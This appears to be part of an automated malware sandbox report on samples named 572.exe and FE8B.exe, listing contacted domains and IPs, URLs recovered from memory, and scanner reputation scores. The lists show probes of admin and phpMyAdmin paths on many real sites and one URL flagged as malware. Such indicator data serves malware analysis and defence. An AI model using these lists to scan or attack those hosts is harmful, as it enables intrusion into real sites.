                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                selebration17io.io12%VirustotalBrowse
                multiideas.com1%VirustotalBrowse
                iam.gov.sa0%VirustotalBrowse
                lazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.com0%VirustotalBrowse
                cjdropshipping.com0%VirustotalBrowse
                qcolamq.impervadns.net0%VirustotalBrowse
                hartico.tv0%VirustotalBrowse
                xsaniime.com0%VirustotalBrowse
                sport.autoplay.cloud0%VirustotalBrowse
                mx156.hostedmxserver.com0%VirustotalBrowse
                mx2.tiktok.com0%VirustotalBrowse
                loopex.io0%VirustotalBrowse
                oferta.senasofiaplus.edu.co0%VirustotalBrowse
                followerstiktok.xyz0%VirustotalBrowse
                nossoplayer.me0%VirustotalBrowse
                web-gcp.api.sc-gw.com0%VirustotalBrowse
                sistemas.pa.gov.br1%VirustotalBrowse
                rg-sg.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.com0%VirustotalBrowse
                academico.um.edu.mx0%VirustotalBrowse
                ov.edesur.com.do0%VirustotalBrowse
                mxa.mailgun.org0%VirustotalBrowse
                idp.uitgeverij-deviant.nl0%VirustotalBrowse
                zarkana2.ro0%VirustotalBrowse
                ventas.officeinsumos.com.ar0%VirustotalBrowse
                woomar.hostingas.lt0%VirustotalBrowse
                mobilsam.com0%VirustotalBrowse
                chainmine.io0%VirustotalBrowse
                netizion.com0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://brasilliker.net/0%Avira URL Cloudsafe
                http://genshin.mihoyo.com/admin.phpmG~0%Avira URL Cloudsafe
                http://chainmine.io/admin.php0%Avira URL Cloudsafe
                http://mobilsam.com/phpMyAdmin/0%Avira URL Cloudsafe
                http://instructory.net/phpmyadmin/n/0%Avira URL Cloudsafe
                https://academico.um.edu.mx/academico/phpmyadmin/5ox0%Avira URL Cloudsafe
                http://ag.ufa9999.com/administrator/index.php0%Avira URL Cloudsafe
                https://academico.um.edu.mx/academico/administrator/0%Avira URL Cloudsafe
                http://innovationdevelopment.eu/sk/admin.php0%Avira URL Cloudsafe
                https://mobilsam.com/category/work-abroad/0%Avira URL Cloudsafe
                https://mobilsam.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.30%Avira URL Cloudsafe
                http://service.uan.edu.co/PhpMyAdmin/E0%Avira URL Cloudsafe
                https://www3.caixa.gov.br/fies/0%Avira URL Cloudsafe
                https://upsconline.nic.in/administrator/0%Avira URL Cloudsafe
                https://v.xsanime.com/phpmyadmin/pmyadmin/0%Avira URL Cloudsafe
                https://discord.com/wp-admin0%Avira URL Cloudsafe
                http://sigapbanjarmasin.info/phpMyAdmin/0%Avira URL Cloudsafe
                http://multiideas.com/admin/0%Avira URL Cloudsafe
                http://mojadovera.sk/administrator/0%Avira URL Cloudsafe
                http://login2.innova.puglia.it/phpmyadmin/0%Avira URL Cloudsafe
                http://innovationdevelopment.eu/admin0%Avira URL Cloudsafe
                https://login2.innova.puglia.it/phpmyadmin/Fz0%Avira URL Cloudsafe
                http://sport.autoplay.cloud/phpmyadmin/0%Avira URL Cloudsafe
                http://loopex.io/administrator/index.phpdex.php0%Avira URL Cloudsafe
                https://secretionsuitcasenioise.shop/apib100%Avira URL Cloudmalware
                http://discord.com/admin.php0%Avira URL Cloudsafe
                https://chainmine.io/phpmyadmin/0%Avira URL Cloudsafe
                http://sigapbanjarmasin.info/phpmyadmin/ndes.edu.co0%Avira URL Cloudsafe
                http://cassiosssionunu.me/index.php0%Avira URL Cloudsafe
                http://multiideas.com/admin0%Avira URL Cloudsafe
                http://loopex.io/admin.php0%Avira URL Cloudsafe
                https://sport.autoplay.cloud/admin/0%Avira URL Cloudsafe
                https://webstatic-sea.hoyoverse.com/upload/static-resource/2021/10/15/bff105936d378d5335b3fddd9c16620%Avira URL Cloudsafe
                https://sii.ittlahuac.edu.mx/phpmyadmin/0)vI0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                21dukes.com
                		127.0.0.1
                		truefalse
                  		high
                  rage.mp
                  		104.26.8.17
                  		truefalse
                    		high
                    www.casinocontroller.com
                    		104.22.43.158
                    		truefalse
                      		high
                      76899.bodis.com
                      		199.59.243.225
                      		truefalse
                        		high
                        relay.opsu.terna.net
                        		104.21.5.25
                        		truefalse
                          		high
                          selebration17io.io
                          		91.215.85.120
                          		truetrueunknown
                          multiideas.com
                          		192.185.5.23
                          		truefalseunknown
                          iam.gov.sa
                          		78.93.109.21
                          		truetrueunknown
                          mx.nexters.com
                          		54.216.244.65
                          		truetrue
                            		unknown
                            cjdropshipping.com
                            		47.251.24.188
                            		truetrueunknown
                            lazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.com
                            		47.246.167.169
                            		truetrueunknown
                            alt2.aspmx.l.google.com
                            		108.177.12.27
                            		truefalse
                              		high
                              mitextoescolar.mineduc.cl
                              		163.247.44.239
                              		truefalse
                                		high
                                mail.pxndx-mcr.boletia.com
                                		54.85.194.183
                                		truefalse
                                  		high
                                  qcolamq.impervadns.net
                                  		45.60.74.50
                                  		truetrueunknown
                                  imap.tiktok.com
                                  		18.214.153.47
                                  		truefalse
                                    		unknown
                                    kwyk.fr
                                    		34.250.93.112
                                    		truefalse
                                      		high
                                      hartico.tv
                                      		104.21.6.150
                                      		truefalseunknown
                                      servicossociais.caixa.gov.br.map.azionedge.net
                                      		179.191.175.66
                                      		truetrue
                                        		unknown
                                        yellosa.co.za
                                        		172.66.41.20
                                        		truefalse
                                          		high
                                          ftp.chainmine.io
                                          		64.91.249.20
                                          		truetrue
                                            		unknown
                                            ro.bongacams.com
                                            		195.85.23.95
                                            		truefalse
                                              		high
                                              xsaniime.com
                                              		172.67.214.175
                                              		truefalseunknown
                                              signin.rockstargames.com
                                              		104.255.105.79
                                              		truefalse
                                                		high
                                                mxa-00569201.gslb.pphosted.com
                                                		205.220.166.26
                                                		truefalse
                                                  		high
                                                  sport.autoplay.cloud
                                                  		104.18.32.109
                                                  		truetrueunknown
                                                  mx156.hostedmxserver.com
                                                  		164.90.197.105
                                                  		truefalseunknown
                                                  mx2.tiktok.com
                                                  		35.172.32.95
                                                  		truetrueunknown
                                                  sigapbanjarmasin.info
                                                  		35.186.223.180
                                                  		truefalse
                                                    		unknown
                                                    loopex.io
                                                    		172.67.148.124
                                                    		truetrueunknown
                                                    secure.vexcorp.com
                                                    		13.248.169.48
                                                    		truefalse
                                                      		high
                                                      oferta.senasofiaplus.edu.co
                                                      		186.113.7.204
                                                      		truetrueunknown
                                                      followerstiktok.xyz
                                                      		103.224.182.210
                                                      		truetrueunknown
                                                      learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com
                                                      		54.158.51.60
                                                      		truefalse
                                                        		high
                                                        park-mx.above.com
                                                        		103.224.212.34
                                                        		truefalse
                                                          		high
                                                          warriorplus.com
                                                          		172.66.40.88
                                                          		truefalse
                                                            		high
                                                            nossoplayer.me
                                                            		162.241.203.30
                                                            		truetrueunknown
                                                            web-gcp.api.sc-gw.com
                                                            		34.149.46.130
                                                            		truetrueunknown
                                                            phonandroid.com
                                                            		195.248.251.103
                                                            		truefalse
                                                              		high
                                                              mail.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
                                                              		185.78.166.130
                                                              		truefalse
                                                                		high
                                                                scontent.xx.fbcdn.net
                                                                		31.13.65.7
                                                                		truefalse
                                                                  		high
                                                                  mx.sistemas.pa.gov.br
                                                                  		177.74.1.30
                                                                  		truetrue
                                                                    		unknown
                                                                    store.steampowered.com
                                                                    		184.25.164.103
                                                                    		truefalse
                                                                      		high
                                                                      sistemas.pa.gov.br
                                                                      		177.74.1.157
                                                                      		truetrueunknown
                                                                      idp.uitgeverij-deviant.nl
                                                                      		87.233.198.20
                                                                      		truetrueunknown
                                                                      alt2.gmr-smtp-in.l.google.com
                                                                      		108.177.12.14
                                                                      		truefalse
                                                                        		high
                                                                        rg-sg.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.com
                                                                        		47.246.165.110
                                                                        		truefalseunknown
                                                                        resergvearyinitiani.shop
                                                                        		172.67.217.100
                                                                        		truetrue
                                                                          		unknown
                                                                          academico.um.edu.mx
                                                                          		201.134.41.61
                                                                          		truetrueunknown
                                                                          accounts.faceit.com
                                                                          		104.17.62.50
                                                                          		truefalse
                                                                            		high
                                                                            ov.edesur.com.do
                                                                            		179.51.70.125
                                                                            		truetrueunknown
                                                                            login2.innova.puglia.it
                                                                            		138.66.39.205
                                                                            		truetrue
                                                                              		unknown
                                                                              mxa.mailgun.org
                                                                              		34.160.13.42
                                                                              		truetrueunknown
                                                                              account.mojang.com
                                                                              		20.231.114.24
                                                                              		truefalse
                                                                                		high
                                                                                aeaaamorim.inovarmais.com
                                                                                		104.26.14.180
                                                                                		truefalse
                                                                                  		high
                                                                                  accounts.google.com
                                                                                  		142.250.105.84
                                                                                  		truefalse
                                                                                    		high
                                                                                    zarkana2.ro
                                                                                    		188.212.100.154
                                                                                    		truetrueunknown
                                                                                    woomar.hostingas.lt
                                                                                    		194.135.86.146
                                                                                    		truefalseunknown
                                                                                    ventas.officeinsumos.com.ar
                                                                                    		181.4.228.155
                                                                                    		truetrueunknown
                                                                                    mx-1.cloudevelops.com
                                                                                    		185.120.71.170
                                                                                    		truetrue
                                                                                      		unknown
                                                                                      gmr-smtp-in.l.google.com
                                                                                      		142.251.15.14
                                                                                      		truefalse
                                                                                        		high
                                                                                        mx2.hostinger.com
                                                                                        		172.65.182.103
                                                                                        		truefalse
                                                                                          		high
                                                                                          sedoparking.com
                                                                                          		64.190.63.136
                                                                                          		truefalse
                                                                                            		high
                                                                                            us04web.zoom.us
                                                                                            		170.114.52.4
                                                                                            		truefalse
                                                                                              		high
                                                                                              mobilsam.com
                                                                                              		178.16.128.181
                                                                                              		truetrueunknown
                                                                                              ngoalongvn.com
                                                                                              		103.90.225.70
                                                                                              		truefalse
                                                                                                		high
                                                                                                eei.uniandes.edu.co
                                                                                                		172.203.148.34
                                                                                                		truefalse
                                                                                                  		unknown
                                                                                                  cmrsanmartin.ziz.cl
                                                                                                  		138.197.59.199
                                                                                                  		truefalse
                                                                                                    		high
                                                                                                    testconnect.garena.com
                                                                                                    		202.81.112.32
                                                                                                    		truefalse
                                                                                                      		high
                                                                                                      chainmine.io
                                                                                                      		64.91.249.20
                                                                                                      		truetrueunknown
                                                                                                      uh-is.mail.protection.outlook.com
                                                                                                      		52.101.68.0
                                                                                                      		truefalse
                                                                                                        		high
                                                                                                        pop.netizion.com
                                                                                                        		45.43.208.39
                                                                                                        		truetrue
                                                                                                          		unknown
                                                                                                          netizion.com
                                                                                                          		104.21.60.188
                                                                                                          		truetrueunknown
                                                                                                          5s5tsl3.impervadns.net
                                                                                                          		45.60.0.44
                                                                                                          		truetrue
                                                                                                            		unknown
                                                                                                            connect.appen.com
                                                                                                            		3.163.115.86
                                                                                                            		truefalse
                                                                                                              		high
                                                                                                              transaccional.saludtotal.com.co
                                                                                                              		190.216.203.136
                                                                                                              		truetrue
                                                                                                                		unknown
                                                                                                                kamgarsetu.mp.gov.in
                                                                                                                		103.94.204.46
                                                                                                                		truetrue
                                                                                                                  		unknown
                                                                                                                  trmpc.com
                                                                                                                  		2.180.10.7
                                                                                                                  		truetrue
                                                                                                                    		unknown
                                                                                                                    instructory.net
                                                                                                                    		36.255.71.45
                                                                                                                    		truefalse
                                                                                                                      		unknown
                                                                                                                      www2.personas.santander.com.ar
                                                                                                                      		200.61.38.87
                                                                                                                      		truetrue
                                                                                                                        		unknown
                                                                                                                        hartico.com
                                                                                                                        		172.67.184.59
                                                                                                                        		truefalse
                                                                                                                          		high
                                                                                                                          discord.com
                                                                                                                          		162.159.136.232
                                                                                                                          		truetrue
                                                                                                                            		unknown
                                                                                                                            mw.redsa.net
                                                                                                                            		77.240.114.212
                                                                                                                            		truetrue
                                                                                                                              		unknown
                                                                                                                              real.avalmag.com
                                                                                                                              		172.67.213.22
                                                                                                                              		truetrue
                                                                                                                                		unknown
                                                                                                                                mx3.name.com
                                                                                                                                		173.192.7.98
                                                                                                                                		truefalse
                                                                                                                                  		high
                                                                                                                                  adf.ly
                                                                                                                                  		172.66.40.139
                                                                                                                                  		truefalse
                                                                                                                                    		high
                                                                                                                                    mx1.hostinger.com
                                                                                                                                    		172.65.182.103
                                                                                                                                    		truefalse
                                                                                                                                      		high
                                                                                                                                      casinocontroller.com
                                                                                                                                      		104.22.43.158
                                                                                                                                      		truefalse
                                                                                                                                        		high
                                                                                                                                        pxndx-mcr.boletia.com
                                                                                                                                        		54.85.194.183
                                                                                                                                        		truefalse
                                                                                                                                          		high
                                                                                                                                          mailgw.nic.in
                                                                                                                                          		164.100.2.66
                                                                                                                                          		truetrue
                                                                                                                                            		unknown
                                                                                                                                            secretionsuitcasenioise.shop
                                                                                                                                            		104.21.16.152
                                                                                                                                            		truetrue
                                                                                                                                              		unknown
                                                                                                                                              mx.zoho.com
                                                                                                                                              		204.141.43.44
                                                                                                                                              		truefalse
                                                                                                                                                		high
                                                                                                                                                gemcreedarticulateod.shop
                                                                                                                                                		172.67.152.52
                                                                                                                                                		truetrue
                                                                                                                                                  		unknown
                                                                                                                                                  084725.parkingcrew.net
                                                                                                                                                  		76.223.26.96
                                                                                                                                                  		truefalse
                                                                                                                                                    		high
                                                                                                                                                    s163-es.ogame.gameforge.com
                                                                                                                                                    		79.110.82.173
                                                                                                                                                    		truefalse
                                                                                                                                                      		high
                                                                                                                                                      innovationdevelopment.eu
                                                                                                                                                      		185.51.191.48
                                                                                                                                                      		truetrue
                                                                                                                                                        		unknown
                                                                                                                                                        opsu.terna.net
                                                                                                                                                        		104.21.5.25
                                                                                                                                                        		truefalse
                                                                                                                                                          		high
                                                                                                                                                          d2dbdn71e1vorj.cloudfront.net
                                                                                                                                                          		3.161.136.69
                                                                                                                                                          		truefalse
                                                                                                                                                            		high
                                                                                                                                                            tiktok.com
                                                                                                                                                            		13.249.120.86
                                                                                                                                                            		truetrue
                                                                                                                                                              		unknown
                                                                                                                                                              star-mini.c10r.facebook.com
                                                                                                                                                              		31.13.88.35
                                                                                                                                                              		truefalse
                                                                                                                                                                		high

                                                                                                                                                                Contacted URLs

                                                                                                                                                                NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                http://chainmine.io/admin.phptrue
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://ag.ufa9999.com/administrator/index.phptrue
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://pt.secure.imvu.com/administrator/false
                                                                                                                                                                  		high
                                                                                                                                                                  http://mobilsam.com/phpMyAdmin/true
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://store.steampowered.com/administrator/index.phpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://cloud.simplify3d.com/pma/false
                                                                                                                                                                      		high
                                                                                                                                                                      http://us04web.zoom.us/administrator/index.phpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://mega.nz/wp-admin/false
                                                                                                                                                                          		high
                                                                                                                                                                          http://secure.vexcorp.com/adminfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://ro.bongacams.com/adminfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://cloud.simplify3d.com/phpmyadmin/false
                                                                                                                                                                                		high
                                                                                                                                                                                http://pt.secure.imvu.com/adminfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://discord.com/wp-adminfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://mojadovera.sk/administrator/true
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://multiideas.com/admin/false
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://casinocontroller.com/PhpMyAdmin/false
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://accounts.binance.com/phpMyAdmin/false
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://hi-in.facebook.com/wp-login.phpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://accounts.google.com/admin.phpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://innovationdevelopment.eu/admintrue
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://sport.autoplay.cloud/phpmyadmin/true
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://signin.rockstargames.com/PhpMyAdmin/false
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://chainmine.io/phpmyadmin/true
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://signin.rockstargames.com/phpMyAdmin/false
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://accounts.google.com/wp-login.phpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://discord.com/admin.phpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://cassiosssionunu.me/index.phptrue
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://sport.autoplay.cloud/admin/true
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://web.facebook.com/pma/false
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://account.booking.com/administrator/index.phpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://loopex.io/admin.phpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://multiideas.com/adminfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://naukrigulf.com/phpmyadmin/false
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://api.cmrsanmartin.ziz.cl/phpMyAdmin/false
                                                                                                                                                                                                        		high

                                                                                                                                                                                                        URLs from Memory and Binaries

                                                                                                                                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                        http://brasilliker.net/572.exe, 00000009.00000003.4513550067.000000004E0C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://gitam.zoom.us/en/about/572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://mobilsam.com/category/work-abroad/572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://innovationdevelopment.eu/sk/admin.php572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://store.cloudflare.steamstatic.com/public/shared/javascript/jquery-1.8.3.min.js?v=.TZ2NKhB-nli572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://authenticate.riotgames.com/admin572.exe, 00000009.00000003.4299205287.00000000405EA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://store.cloudflare.steamstatic.com/public/shared/images/trans.gif572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://instructory.net/phpmyadmin/n/572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                https://lookaside.fbsbx.com/phpMyAdmin/572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://easygold.joyalukkas.com/PhpMyAdmin/Hz572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://genshin.mihoyo.com/admin.phpmG~572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    https://store.steampowered.com/app/2582660/And_the_Hero_Was_Never_Seen_Again/?snr=1_4_4__tab-Upcomin572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://store.steampowered.com/category/adventure/?snr=1_4_4__12572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://gitam.zoom.us/administrator/~572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://academico.um.edu.mx/academico/administrator/572.exe, 00000009.00000003.4327514305.000000004D9A0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                          http://easygold.joyalukkas.com/pma/572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://academico.um.edu.mx/academico/phpmyadmin/5ox572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                            https://store.steampowered.com/vr/?snr=1_4_4__125572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://service.uan.edu.co/PhpMyAdmin/E572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                              https://store.steampowered.com/app/1562430?snr=1_4_4__40_2572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://mobilsam.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.3572.exe, 00000009.00000003.4359155802.0000000040306000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040305000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                https://store.steampowered.com/stats/?snr=1_4_4__global-header572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://account.mojang.com/phpmyadmin/com572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://store.steampowered.com/vrhardware/?snr=1_4_4__12572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://store.steampowered.com/app/2420880/WitchHand/?snr=1_4_4__tab-Upcoming572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        https://secretionsuitcasenioise.shop/apibFE8B.exe, 00000007.00000003.2450711514.0000000001133000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                        https://store.steampowered.com/phpmyadmin/v572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          http://opsu.terna.net/wp-login.phpl5c572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high
